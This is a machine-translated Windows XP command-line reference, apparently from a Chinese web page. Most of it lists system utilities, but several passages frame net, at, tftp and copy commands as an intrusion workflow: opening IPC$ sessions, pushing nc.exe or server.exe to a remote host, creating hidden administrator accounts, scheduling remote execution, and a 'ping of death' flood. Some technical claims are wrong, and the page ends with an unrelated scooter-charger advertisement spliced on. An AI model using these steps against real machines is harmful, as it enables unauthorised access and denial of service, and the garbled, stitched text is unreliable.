Windows XP cmd command Daquan

Windows XP cmd command Daquan

One, ping

It is a command to check whether the network is smooth or the speed of the network connection. As an administrator or hacker living on the network, the ping command is the first DOS command that must be mastered. The principle it uses is this: machines on the network have uniquely determined IP addresses, and we give the target When the IP address sends a data packet, the other party will return a data packet of the same size. Based on the returned data packet, we can determine the existence of the target host, and can initially determine the operating system of the target host. Let's take a look at some of its commonly used operations. First look at the help, type: ping /? Enter in the DOS window. The help screen shown. Here, we only need to grasp some basic useful parameters (the same below).

-t means to send packets to the target IP without interruption until we force it to stop. Imagine if you use 100M broadband access and the target IP is a 56K kitten, then it will not take long before the target IP drops because it can't withstand so much data. Haha, an attack is so simple to achieve.

-l defines the size of the data packet sent, the default is 32 bytes, we can use it to define up to 65500 bytes. Combined with the -t parameter introduced above, it will have a better effect.

-n defines the number of data packets sent to the target IP, the default is 3 times. If the network speed is slow, 3 times is also a waste of time for us, because now our purpose is only to determine whether the target IP exists, then define it as one.

Explain that if the -t parameter and the -n parameter are used together, the ping command is based on the parameter that is placed behind, such as "ping IP -t -n 3". Although the -t parameter is used, it is not always pinged. But only ping 3 times. In addition, the ping command does not have to ping the IP, you can also directly ping the host domain name, so you can get the host IP.

Below we give an example to illustrate the specific usage.

Here TIme = 2 means that the time taken from sending a data packet to receiving a data packet is 2 seconds, from which you can judge the size of the network connection speed. The return value from TTL can preliminarily judge the operating system of the pinged host. The reason for saying "preliminary judgment" is because this value can be modified. Here TTL = 32 indicates that the operating system may be win98.

(Tips: If TTL = 128, it means that the target host may be Win2000; if TTL = 250, then the target host may be Unix)

As for the use of the ping command to quickly find LAN faults, you can quickly search for the fastest QQ server, and you can ping others ... These are up to everyone to play.

Second, nbtstat

This command uses NetBIOS over TCP / IP to display protocol statistics and current TCP / IP connections. Using this command you can get the NETBIOS information of the remote host, such as the user name, the workgroup to which it belongs, and the MAC address of the network card. Here we need to understand a few basic parameters.

-a Use this parameter, as long as you know the machine name of the remote host, you can get its NETBIOS information (the same below).

-A This parameter can also get the NETBIOS information of the remote host, but you need to know its IP.

-n List the NETBIOS information of the local machine.

When you get the other party's IP or machine name, you can use the nbtstat command to further get the other party's information, which increases the insurance factor of our invasion.

Three, netstat

This is a command to check the network status, easy to operate and powerful.

-a View all the open ports of the local machine, you can effectively find and prevent Trojans, you can know the services and other information opened by the machine, as shown in Figure 4.

Here we can see that the local machine is open with FTP service, Telnet service, mail service, WEB service, etc. Usage: netstat -a IP.

-r List the current routing information, tell us the local machine's gateway, subnet mask and other information. Usage: netstat -r IP.
Four, tracert

Tracking routing information, use this command to find out all the paths through which data is transmitted from the local machine to the target host, which is very helpful for us to understand the network layout and structure. As shown in Figure 5.

This shows that the data is transferred from the local machine to the 192.168.0.1 machine without any transfer between them, indicating that the two machines are in the same LAN. Usage: tracert IP.

Five, net

This command is the most important one of the network commands. You must thoroughly understand the usage of each of its subcommands, because its function is too powerful. This is simply the best intrusion tool provided by Microsoft. First let's take a look at the subcommands that it has. Type net /? To enter as shown in Figure 6.

Here, we focus on several commonly used subcommands for intrusion.

net view

Use this command to view all shared resources of the remote host. The command format is net view \ IP.

net use

Map a shared resource of a remote host as a local drive letter, and the graphical interface is convenient to use. The command format is net use x: \ IP \ sharename. The previous one indicates that the shared directory named magic of 192.168.0.5IP is mapped to the local Z disk. The following means establishing an IPC $ connection with 192.168.0.7 (net use \ IP \ IPC $ "password" / user: "name"),

After the IPC $ connection is established, hehe, you can upload the file: copy nc.exe \ 192.168.0.7 \ admin $, which means that nc.exe in the local directory is transferred to the remote host, combined with other DOS commands to be introduced later You can achieve an invasion.

net start

Use it to start services on the remote host. When you establish a connection with a remote host, what if you find that its service has not been started, and you want to use this service? Just use this command to start it. Usage: net start servername, as shown in Figure 9, successfully started the telnet service.

net stop

What should I do if a service on the remote host is hindered after the invasion? Use this command to stop and it is ok, the usage is the same as net start.

net user

View information related to accounts, including creating new accounts, deleting accounts, viewing specific accounts, activating accounts, disabling accounts, etc. This is very beneficial to our invasion, and most importantly, it provides the premise for us to clone the account. Type net user without parameters to view all users, including those that have been disabled. Explained separately below.

1, net user abcd 1234 / add, create a new account named abcd, password 1234, the default is a member of the user group.

2. Net user abcd / del, delete the user whose user name is abcd.

3. Net user abcd / acTIve: no, disable the user whose user name is abcd.

4. Net user abcd / acTIve: yes, activate the user whose user name is abcd.

5, net user abcd, view the situation of the user whose user name is abcd

net localgroup

View all information related to user groups and perform related operations. Type net localgroup without parameters to list all current user groups. During the intrusion process, we generally use it to promote an account to the administrator group account, so that we can use this account to control the entire remote host. Usage: net localgroup groupname username / add.

Now we add the newly created user abcd to the administrator group. At this time, the abcd user is already a super administrator. Oh, you can use net user abcd to check his status. Compare it with Figure 10. come out. But this is too obvious, the network administrator can see the flaws at a glance, so this method can only deal with rookie network administrators, but we still have to know. The current method is to use other tools and means to clone a super administrator that the network administrator cannot see. This is something to say. Friends who are interested can refer to the article "Analyzing Long Account from Shallow to Deep" in the 30th issue of "Hacker Defense".

net TIme

This command can view the current time of the remote host. If your goal is only to enter the remote host, then this command may not be used. But the simple invasion succeeded, is it just a look? We need to penetrate further. This requires that even the current time of the remote host needs to be known, because time and other means (to be described later) can be used to achieve the regular start of a command and program, laying a foundation for our further invasion. Usage: net time \ IP.

Six, at

The purpose of this command is to schedule a specific command and program to be executed on a specific date or time (know that net time is important?). When we know the current time of the remote host, we can use this command to let it execute a program and command at a later time (such as 2 minutes later). Usage: at time command \ computer.

It means that at 6:55, let the computer named a-01 start the telnet service (here net start telnet is the command to start the telnet service).
Seven, ftp

Everyone should be familiar with this command, right? There are many ftp hosts open on the network, and a large part of them are anonymous, which means anyone can log in. Now if you scan a host with open ftp service (usually a machine with port 21 open), what if you still don't use the ftp command? The basic method of using ftp command is given below.

First type ftp at the command line, the ftp prompt appears, at this time you can type "help" to view the help (any DOS command can use this method to view its help).

As you may see, how do you use so many commands? In fact, you do n’t need that much, but a few basics are enough.

The first is the login process, which is going to use open. Enter "open host IP ftp port" directly at the ftp prompt and press Enter. The default port is 21 by default, you can not write. The next step is to enter a valid user name and password to log in. Here is an example of anonymous ftp.

The username and password are both ftp, and the password is not displayed. When prompted **** logged in, it means that the login is successful. Because it is an anonymous login, the user appears as Anonymous.

Next, we will introduce the use of specific commands.

dir is the same as the DOS command. It is used to view the files on the server. Just hit dir and press Enter to see the files on the ftp server.

cd into a folder.

get Download the file to the local machine.

put upload files to a remote server. It depends on whether the remote ftp server gives you write permission. If you can, huh, huh, not much to say about how to use it. Let's play freely.

delete Delete files on the remote ftp server. This must also ensure that you have write permissions.

bye quit the current connection.

quit Ibid.


Eight, telnet

Powerful remote login command, almost all intruders like to use it, after many trials. why? It is simple to operate, just like using your own machine, as long as you are familiar with DOS commands, after successfully connecting to the remote machine as administrator, you can use it to do everything you want. Here's how to use it. First, type telnet, and then type help to view its help information.

Then type open IP at the prompt and press Enter. At this time, a login window appears, allowing you to enter a valid user name and password. Any password entered here is not displayed.

When the user name and password are entered correctly, the telnet connection is successfully established. At this time, you have the same permissions as the user on the remote host. Using the DOS command can achieve what you want to do. Here I use the super administrator authority to log in.

So far, the introduction of network DOS commands has come to an end. The purpose of the introduction here is just to give the rookie network administrator an impression and let him know the importance of familiarity and mastering network DOS commands. In fact, the DOS commands related to the network are far more than this, here is just to throw the bricks, hoping to help the majority of rookie network management. Learning DOS is a great help for being a good network administrator, and is particularly proficient in some network DOS commands.

In addition, everyone should be clear that anyone who wants to enter the system must have a valid user name and password (the input method vulnerability is almost extinct), even if you only have a small permission for the account, you can use it to To achieve the final goal. Therefore, to eliminate blank passwords firmly and add a strong password to your account is the best way to defend against weak password intrusion.

Finally, sincerely speaking, it is the most important thing to cultivate a good sense of security.

=============================================
Start → Run → Command Highlights
winver check Windows version
wmimgmt.msc Open the Windows management architecture (wmi)
wupdmgr Windows Updater
wscript Windows script host settings
write tablet
winmsd system information
wiaacmgr scanner and camera wizard
winchat xp comes with LAN chat
mem.exe displays memory usage
msconfig.exe system configuration utility
mplayer2 simple widnows media player
mspaint drawing board
mstsc remote desktop connection
mplayer2 media player
magnify magnifier utility
mmc open console
mobsync synchronization command

dxdiag check directx information
drwtsn32 system doctor
devmgmt.msc device manager
dfrg.msc Disk Defragmenter
diskmgmt.msc Disk management utility
dcomcnfg open system component service
ddeshare Open dde sharing settings
dvdplay dvd player

net stop messenger stop messenger service
net start messenger start messenger service
notepad open notepad
nslookup network management tool wizard
ntbackup system backup and restore
Narrator screen "Narrator"
ntmsmgr.msc mobile storage manager
ntmsoprq.msc mobile storage administrator operation request
netstat -an (tc) command to check the interface

syncapp creates a briefcase
sysedit system configuration editor
sigverif file signature verification program
sndrec32 recorder
shrpubw creates a shared folder
secpol.msc local security policy
The syskey system is encrypted. Once encrypted, it cannot be unlocked to protect the double password of the Windows XP system.
services.msc local service settings
sndvol32 volume control program
sfc.exe system file checker
sfc / scannow windows file protection tsshutdn 60 seconds countdown shutdown command
Introduction to tourstart xp (roaming xp program that appears after installation is complete)
taskmgr task manager

eventvwr event viewer
eudcedit word making program
explorer open explorer

packager object wrapper
perfmon.msc computer performance monitoring program
progman program manager

regedit.exe Registry
rsop.msc group policy result set
regedt32 Registry Editor
rononce -p 15 seconds shutdown
regsvr32 / u * .dll Stop dll file running
regsvr32 / u zipfldr.dll cancel zip support

cmd.exe cmd command prompt
chkdsk.exe chkdsk disk check
certmgr.msc certificate management utility
calc start calculator
Charmap startup character map
cliconfg sql server client network utility
clipbrd clipboard viewer
conf start netmeeting
compmgmt.msc computer management
cleanmgr garbage collection
ciadv.msc indexing service program

osk open on-screen keyboard
odbcad32 odbc data source manager
oobe / msoobe / a Check if xp is activated
lusrmgr.msc local users and groups
logoff logout command

iexpress Trojan bundling tool, the system comes with

nslookup ip address detector

fsmgmt.msc shared folder manager

utilman accessibility manager

gpedit.msc Group Policy

The following are the commonly used running commands of the Windows operating system.Executing these commands can open the relevant utility programs corresponding to the system.If you can basically use it, you can check and repair the most basic faults of the system.In addition to the logout and close system commands, All other commands, you may wish to give it a try!

Run \ enter CMD \ enter the corresponding related utility program:
. Open C: \ Documents and Settingsï¼¼XXX (the user name currently logged into Windows XP)
.. Open the Documents and Settings folder under the drive letter where Windows XP is located
... Open the "My Computer" option.
accwiz.exe Accessibility Wizard
actmovie.exe directly displays the installation tool
append.exe allows the program to open the data in the specified directory
arp.exe Display and change the corresponding list of computer IP and hardware physical address
at.exe scheduled task
atmadm.exe ATM call manager statistics
attrib.exe displays and changes file and folder properties
autochk.exe detects and repairs the file system (XP is not available)
autoconv.exe automatically converts the system during startup (XP is not available)
autofmt.exe format process during startup (XP is not available)
autolfn.exe uses long file name format (XP is not available)
arp.exe displays and changes the correspondence between the computer's IP and the hardware physical address
calc.exe calculator
Bootvrfy.exe reports successful startup
cacls.exe display and edit ACL
cdplayer.exe CD player
change.exe terminal server related queries (XP is not available)
charmap.exe character map
chglogon.exe starts or disables session recording (XP is not available)
chgport.exe change port (terminal service) (XP is not available)
chgusr.exe change user (terminal service) (XP is not available)
chkdsk.exe disk detection program
chkntfs.exe NTFS disk detection program
cidaemon.exe forms Ci document service
cipher.exe displays or changes encrypted files or directories on NTFS
cisvc.exe opens the index content
ckcnv.exe Transform Cookies
cleanmgr.exe Disk Cleanup
cliconfg.exe SQL client network tool
clipbrd.exe scrapbook viewer
clipsrv.exe runs the Clipboard service
clspack.exe to create a list of system files
cluster.exe shows the cluster of the domain (XP is not available)
cmd.exe into 2000 \ XP DOS
cmdl32.exe automatic download connection management
cmmgr32.exe connection manager
cmmon32.exe connection manager monitoring
cmstp.exe connection manager configuration file installer
comclust.exe cluster
comp.exe compares the contents of two files and file sets
conf start netmeeting chat tool
control userpasswords2 XP password management.
compmgmt.msc computer management
cprofile.exe conversion display mode (XP is not available)
Start, run, enter CMD \ enter net config workstation computer name \ full computer name \ username workstation is active (ie network description) \ software version (ie software version number) \ DNS name of workstation domain workstation domain login domain \ COM open time timeout (seconds) \ COM send amount (bytes) \ COM send timeout (msec)
CMD \ Enter net config workstation to change the configurable workstation service settings.
CMD \ Enter net config server to display the server computer name \ server comment \ server version (ie software version number) that cannot be configured
The server is active (that is, the network description) \ The server is hidden (that is, / hidden setting)
Maximum number of logged-in users (that is, the maximum number of users who can use server shared resources)
The maximum number of open files per session (that is, the maximum number of user files that can be opened in one session)
Idle session time (minimum)
chkdsk.exe disk check.
The Chkdsk / r command in the Chkdsk / r 2000 command console checks and repairs system files
cleanmgr garbage collection
Clipbrd Clipboard Viewer
C: boot.ini Open the boot menu
compact.exe displays or changes the compression status of files on NTFS partitions
conime.exe IME console
control.exe control panel
convert.exe NTFS converts the file system to NTFS
convlog.exe Convert IIS log file format to NCSA format
cprofile.exe conversion display mode
cscript.exe compared to the host version
csrss.exe Client server Runtime process (XP is not available)
csvde.exe format conversion program (XP is not available)
dcpromo Active Directory installation (XP is not available)
drwtsn32 system doctor
diskmgmt.msc Disk Manager (and PowerQuest PartitionMagic 8.0)
dvdplay DVD player
devmgmt.msc device manager (check computer hardware, drivers)
dxdiag check DirectX information
dcomcnfg.exe DCOM configuration properties (console root directory)
dcpromo.exe installation wizard (XP is not available)
ddeshare.exe DDE share
debug.exe check DEBUG
dfrgfat.exe FAT partition disk defragmentation program
dfrgntfs.exe NTFS partition disk defragmentation program (XP is not available)
dfs_cmd_.exe configure DFS tree (XP is not available)
dfsinit.exe distributed file system initialization (XP is not available)
dfssvc.exe distributed file system server (XP is not available)
diantz.exe make CAB file
diskperf.exe disk performance counter
dmremote.exe part of the disk management service (XP is not available)
doskey.exe command line to create a macro
dosx.exe DOS extension
dplaysvr.exe runs help directly (XP is not available)
drwatson.exe Dr. Watson error detection
drwtsn32.exe Dr. Watson display and configuration management
dvdplay.exe DVD playback
dxdiag.exe Direct-X diagnostic tool
Text editing of edlin.exe command line
esentutl.exe MS database tool
eudcedit.exe word making program
eventvwr.exe event viewer
exe2bin.exe converts EXE files to binary
expand.exe unzip
extrac32.exe CAB tool
fsmgmt.msc shared folder
fastopen.exe fast access to hard disk files in memory
faxcover.exe fax cover editor
faxqueue.exe shows the fax queue
faxsend.exe Send Fax Wizard
faxsvc.exe starts the fax service
fc.exe compares the difference between two files
find.exe finds lines of text in a file
findstr.exe finds the line in the file
finger.exe a user and displays the statistical results
fixmapi.exe fix MAPI file
flattemp.exe allows or disables the temporary file directory (XP is not available)
fontview.exe displays the fonts in the font file
forcedos.exe Forces the file to run in DOS mode
ftp.exe FTP download
gpedit.msc Group Policy
gdi.exe graphical interface driver
grpconv.exe conversion program administrator group
hostname.exe displays the hostname of the machine
Internat input method icon
iexpress Trojan bundling tool, the system comes with
ieshwiz.exe Custom Folder Wizard
iexpress.exe iexpress installation package
iisreset.exe restart IIS service (IIS is not installed, not available)
internat.exe keyboard language indicator (XP is not available)
ipconfig.exe View IP configuration
ipsecmon.exe IP Security Monitor
ipxroute.exe IPX routing and source routing control program
irftp.exe wireless connection
ismserv.exe installs or deletes services in Service Control Manager
jdbgmgr.exe Java4 debugger
Jetconv.exe converts Jet Engine database (XP is not available)
Jetpack.exe compressed Jet database (XP is not available)
jview.exe Java command line loader
label.exe changes the volume label of the drive
lcwiz.exe License Wizard (XP is not available)
ldifde.exe LDIF directory exchange command line management (XP is not available)
licmgr.exe Terminal Services License Agreement Management (XP not available)
lights.exe shows the connection status (XP is not available)
llsmgr.exe Windows 2000 license agreement management (XP is not available)
llssrv.exe starts the license agreement server (XP is not available)
locator.exe RPC Locator remote positioning
lodctr.exe call performance count
logoff.exe logs off the current user
lpq.exe displays the status of the remote LPD print queue and print tasks sent to the Unix-based server
lpr.exe is used by Unix client printers to send print jobs to the NT printer server connected to the printing device.
lsass.exe DLL running LSA and Server
lserver.exe specifies the new DNS domain of the default Server (XP is not available)
lusrmgr.msc local account management
mmc console
mplayer2 player
macfile.exe to manage MACFILES (XP is not available)
magnify.exe magnifying glass
makecab.exe make CAB file
mem.exe displays memory status
migpwd.exe migration password
mmc.exe console
mnmsrvc.exe remote desktop sharing
mobsync.exe synchronization directory manager
mountvol.exe creates, deletes, or lists mount points for volumes.
mplay32.exe Media Player
mpnotify.exe notification application
mqbkup.exe information queue backup and recovery tool
mqmig.exe MSMQ Migration Utility message queue migration tool
mrinfo.exe uses SNMP multicast routing
mscdexnt.exe install MSCD
msdtc.exe dynamic transaction processing console
msg.exe sends messages to local or remote clients
mshta.exe HTML application host
msiexec.exe starts the Windows installer
mspaint.exe opens the drawing board
mstask.exe task scheduler
mstinit.exe Task Schedule Installation
Msconfig.exe system configuration utility (configuration startup options, service items)
mem.exe displays memory usage
mspaint drawing board
Net Stop Messenger
Net Start Messenger resumes messenger service
nslookup network management tool
Nslookup IP address detector
ntbackup system backup and restore
nbtstat.exe uses NBT (NetBIOS over TCP / IP) to display protocol statistics and current TCP / IP connections.
nddeapir.exe NDDE API server
netsh.exe is used to configure and monitor the Windows 2000 command line script interface (XP is not available)
netstat.exe displays protocol statistics and current TCP / IP network connections.
nlsfunc.exe loads country-specific information. Windows 2000 and the MS-DOS subsystem do not use this command to accept the command only for compatibility with MS-DOS files.
notepad.exe Open Notepad
nslookup.exe This diagnostic tool displays information from the Domain Name System (DNS) name server.
ntbackup.exe backup and fault repair tool
ntfrs.exe NT file copy service (XP is not available)
ntvdm.exe emulates a 16-bit Windows environment
nw16.exe NetWare steering
nwscript.exe Run Netware script
odbcad32.exe 32-bit ODBC data source management (driver management)
odbcconf.exe command line configuration ODBC driver and data source
packager.exe object packager
pathping.exe contains Ping and Tracert programs
pentnt.exe checks Pentium for floating point errors
perfmon.exe System Performance Monitor
ping.exe to verify the connection to the remote computer
posix.exe for Unix compatibility
print.exe prints a text file or displays the contents of the print queue.
progman.exe program manager
psxss.exe Posix subsystem application
qappsrv.exe shows the programs available on the terminal server on the network
qprocess.exe displays process information locally or remotely (terminal service required)
query.exe query process and dialogue (XP is not available)
quser.exe displays user login information (requires terminal service)
qwinsta.exe displays terminal service information
rononce -p 15 seconds shutdown
rasAdmin remote access service.
regedit.exe Registry Editor
rasadmin.exe starts the remote access service (XP is not available)
rasautou.exe establishes a RAS connection
rasdial.exe broadband, dial-up connection
ras.exe runs RAS connection (XP is not available)
Copy files between the rcp.exe computer and the system running the remote shell port monitoring program rshd
rdpclip.exe terminal and local copy and paste files
recover.exe recovers readable information from bad or defective disks.
redir.exe runs the redirect service
regedt32.exe 32-bit registration service
regini.exe modify the registration license with a script
regwiz.exe registration wizard
replace.exe replaces files in the target directory with files of the same name in the source directory.
rexec.exe The rexec command verifies the user name on the remote computer before executing the specified command. This command can only be used after the TCP / IP protocol is installed.
risetup.exe runs the remote installation wizard service (XP is not available)
route.exe controls the network routing table
rsh.exe runs commands on remote computers running RSH services
rsnotify.exe remote storage notification echo
runas.exe allows users to run specified tools and programs with other permissions
rundll32.exe start 32-bit DLL program
rwinsta.exe resets the session subsystem hardware and software to their original values
Sndvol32 volume control program
sfc.exe or CMD \ sfc.exe carriage return system file checker
services.msc network connection service
syskey system encryption, (cannot be unlocked once encrypted, protect the double password wupdmgr WIDNOWS UPDATE of windows xp system)
SCANREG / RESTORE command to restore the most recent registry
secedit.exe automated security configuration management
services.exe controls all services
sethc.exe set high contrast
setver.exe sets the MS-DOS version number reported by the MS-DOS subsystem to the program
sfc.exe system file check
shadow.exe monitors another midrange server session
shrpubw.exe to create and share folders
sigverif.exe file signature verification
smlogsvc.exe performance logs and alerts (XP is not available)
sndrec32.exe recorder
sndvol32.exe displays sound control information
snmp.exe Simple Network Management Protocol (XP is not available)
snmptrap.exe SNMP tool (XP is not available)
srvmgr.exe server manager (XP is not available)
subst.exe associates the path with the drive letter
sysedit.exe system configuration editor
syskey.exe NT account database encryption tool
sysocmgr.exe> ​​Windows installer
systray.exe runs systray with low permissions
taskmgr task manager
tasklist / svc (CMD) to understand how many system services are provided by each SVCHOST process
tlist -S (CMD) Understand how many system services each SVCHOST process provides (
taskman.exe Task Manager (XP is not available)
taskmgr.exe task manager
tcmsetup.exe phone service customer installation
tcpsvcs.exe TCP service
termsrv.exe terminal service
tftp.exe transfers files to or from a remote computer running TFTP service
themes.exe desktop theme (XP not available)
tlntadmn.exe Administrator Telnet service management
tlntsess.exe displays the current Telnet session
tlntsvr.exe starts Telnet service
The tracert.exe diagnostic utility sends Internet Control Message Protocol (ICMP) echo packets containing different time-to-live (TTL) values ​​to the target to determine the route to the target
tsadmin.exe Administrator Terminal Services Manager (XP is not available)
tscon.exe pastes user session to terminal conversation
tsdiscon.exe disconnects users of Terminal Services
tskill.exe kills terminal services
tsprof.exe uses terminal services to get query results
tsshutdn.exe shuts down the system
part of unlodctr.exe performance monitor
upg351db.exe upgrade Jet database (XP is not available)
ups.exe UPS service UPS service
user.exe Windows core service
userinit.exe open my document
usrmgr.exe domain user manager
utilman.exe specifies that the machine is automatically turned on when 2000 starts
vwipxspx.exe calls IPX / SPX VDM
w32tm.exe time server
wextract.exe extracts Windows files
winchat.exe opens the Windows chat tool
winhlp32.exe running help system
winmsd.exe View system information
winver.exe displays the Windows version
wizmgr.exe Windows Management Wizard (XP is not available)
wjview.exe Java command line call Java
write.exe Open WordPad
wscript.exe script tool
wupdmgr.exe Windows update Run the Windows update upgrade wizard
winver check Windows version
Win98 system tools start, run, enter Msconfig system configuration utility to configure startup options, including config.sys, autoexec.bat, win.ini, system.ini and the startup items in the registry and program menu. And can set whether to start failure.
Start, run, enter Regedit Registry modification tool Registry Editor, if you are not sure do not modify the registry at will!
Start, run, and enter the Regsvr32 dll registration tool. When prompted to find the dll file, you can use this to register the dynamic link library.
Start, run, and enter Regwiz Registration Wizard for registration. Verify system files and restore system files.
If a similar * .vxd file error occurs during startup, you can use this to restore the vxd file.
Start, run, enter Scandskw disk scanning program, used to scan repair disk. If there is an error in the disk or file, it can be used for initial repair.
Start, run, enter DxDiag DirectX diagnostic tool can be used to detect whether DirectX is running normally.
Start, run, enter NETSCAPE

ESC: clear the current command line;
F7: Display the command history, give all the commands you have entered in the form of a graphical list window, and use the up and down arrow keys to choose to execute the command again.
F8: Search the history of commands, and cycle through all the commands you have entered until you press the Enter key;
F9: Select the command by number, and ask you to enter the number corresponding to the command (starting from 0) in a graphical dialog box, and display the command on the screen;
Ctrl + H: Delete a character to the left of the cursor;
Ctrl + C Ctrl + Break, forcibly abort the command execution;
Ctrl + M: Enter confirmation key;
Alt + F7: Clear the history of all commands that have been entered;
Alt + PrintScreen: intercept the contents of the current command window on the screen.
The virus has damaged the system files, please use anti-virus software to check and kill the virus, and then use the Chkdsk / r command in the "Command Console" provided by Windows 2000 to check and repair the system files.
DOS Command Dictionary ... Favorites

net use \ ip \ ipc $ "" / user: "" Create an empty IPC link

net use \ ip \ ipc $ "password" / user: "user name" Create IPC non-empty link

net use h: \ ip \ c $ "password" / user: "user name" and map the other party directly after login: H to local:

net use h: \ ip \ c $ After login, map the other party C: to H:

net use \ ip \ ipc $ / del delete IPC link

net use h: / del deletes the mapping from the counterpart to the local H:

net user username password / add create user

net user guest / active: yes activates the guest user

net user to see which users

net user account name view account properties

net localgroup *** istrators username / add Add "user" to the administrator to make it have administrator rights, note: add s after *** istrator

net start to see which services are turned on

net start service name to start the service; (eg: net start telnet, net start schedule)

net stop service name to stop a service

net time \ target ip view the other party's time

net time \ target ip / set Set the local computer time to synchronize with the "target IP" host time, plus the parameter / yes to cancel the confirmation message

net view Check which shares are enabled in the local LAN

net view \ ip check which sharing is enabled in the other party's LAN

net config display system network settings

net logoff disconnected share

net pause service name pause a service

net send ip "text message" to send a message to the other party

net ver The type and information of the network connection being used in the LAN

net share View locally opened share

net share ipc $ open ipc

net share ipc $ / del delete ipc

net share c $ / del delete C: share

net user guest 12345 After logging in as the guest user, change the password to 12345

net password password change system login password

netstat -a to see which ports are open, commonly used netstat -an

netstat -n View the network connection of the port, commonly used netstat -an

netstat -v View ongoing work

Example of netstat -p protocol name: netstat -p tcq / ip Check the usage of a protocol (check the usage of tcp / ip protocol)

netstat -s View all protocol usage in use

nbtstat -A ip If one of the ports of the other party's 136 to 139 is open, you can view the recently logged-in user name of the other party (the user name before 03)-Note: the parameter -A should be capitalized

tracert-parameter ip (or computer name) trace route (data packet), parameter: "-w number" is used to set timeout interval

ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。

ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)

ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息

tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)

kill -F 进程名加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)

del -F 文件名加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/AR、/AH、/AS、/AA表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/AS *.*”表示删除当前目录下除系统文件以外的所有文件

#2 二:

del /S /Q 目录或用:rmdir /s /Q 目录/S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)

move 盘符\路径\要移动的文件名存放移动文件的路径\移动后文件名移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖

fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令

at id号开启已注册的某个计划任务

at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止

at id号/delete 停止某个已注册的计划任务

at 查看所有的计划任务

at \ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机

finger username @host 查看最近有哪些用户登陆

telnet ip 端口远和登陆服务器,默认端口为23

open ip 连接到IP(属telnet登陆后的命令)

telnet 在本机上直接键入telnet 将进入本机的telnet

copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件

copy c:\srv.exe \ip\***$ 复制本地c:\srv.exe到对方的***下

cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件

copy \ip\***$\s .exe c:\ 或:copy\ip\***$\*.* 复制对方***i.exe文件(所有文件)至本地C:

xcopy 要复制的文件或目录树目标地址\目录名复制文件和目录树,用参数/Y将不提示覆盖相同文件

tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后,将“IP”的server.exe下载到目标主机c:\server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送

tftp -i 对方IP put c:\server.exe 登陆后,上传本地c:\server.exe至主机

ftp ip 端口用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)

route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface

arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息

start 程序名或命令/max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令

mem 查看cpu使用情况

attrib 文件名(目录名) 查看某文件(目录)的属性

attrib 文件名-A -R -S -H 或+A +R +S +H 去掉(添加)某文件的存档,只读,系统,隐藏属性;用+则是添加为某属性

dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间

date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间

set 指定环境变量名称=要指派给变量的字符设置环境变量

set 显示当前所有的环境变量

HIGH QUALITY:Made of only the highest quality materials and built to last! Our chargers are gauranteed to match the original brand name chargers' quality.

EASY TO USE: Simply plug the charger into a wall outlet and then directly into your scooter.

The charger protected: Short circuit protection/ over current protection/ over voltage protection; red light -- charging, green light -- charge OK, it stop automatically when the battery is full. Warm Tips: To avoid the temperature of your charger too high, please do not charge too long.

The shell is made by high-quality plastic, smooth appearance with no impurities. Good safety performance, more reliable for you to use. Red light means charging; Green light means fully charged or disconnect.

Li-ion Charger

Aviation Plug Scooter Charger,Power Scooter Charger,Li-Ion Battery Charger

Shenzhen Waweis Technology Co., Ltd. , https://www.waweis.com

Posted on